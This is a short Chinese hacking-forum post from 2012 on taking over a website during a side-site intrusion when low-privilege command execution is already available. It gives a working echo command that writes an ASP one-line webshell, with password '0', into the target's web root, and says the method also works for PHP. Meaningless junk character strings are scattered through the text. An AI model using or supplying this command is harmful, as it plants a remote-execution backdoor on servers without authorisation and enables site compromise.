在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
4 l1 _( t) A6 `( d4 Z
! c! Y- j( ?2 I; O! z' ~# M命令格式& l& D! I5 r6 d1 Z/ N" r& a8 j
g! ]& Q! ^7 [% y; U, [0 s
Echo 语句 >目标站绝对目录+ ~( ^" X. e" F/ q- F; f8 T9 R8 \
3 ?. |+ t- C# K. n% i
例如: ) n6 j% P0 T2 H. y( |( e+ m
, _8 @8 u* f' e$ k9 o, r
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
( x2 j5 G" N5 z+ [7 b* U( v6 T# D! ^( v( e& P& v
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。; P: w, Z0 d% a; m6 c' c# q
|
发表于 2012-9-23 14:40:24
收藏
支持
反对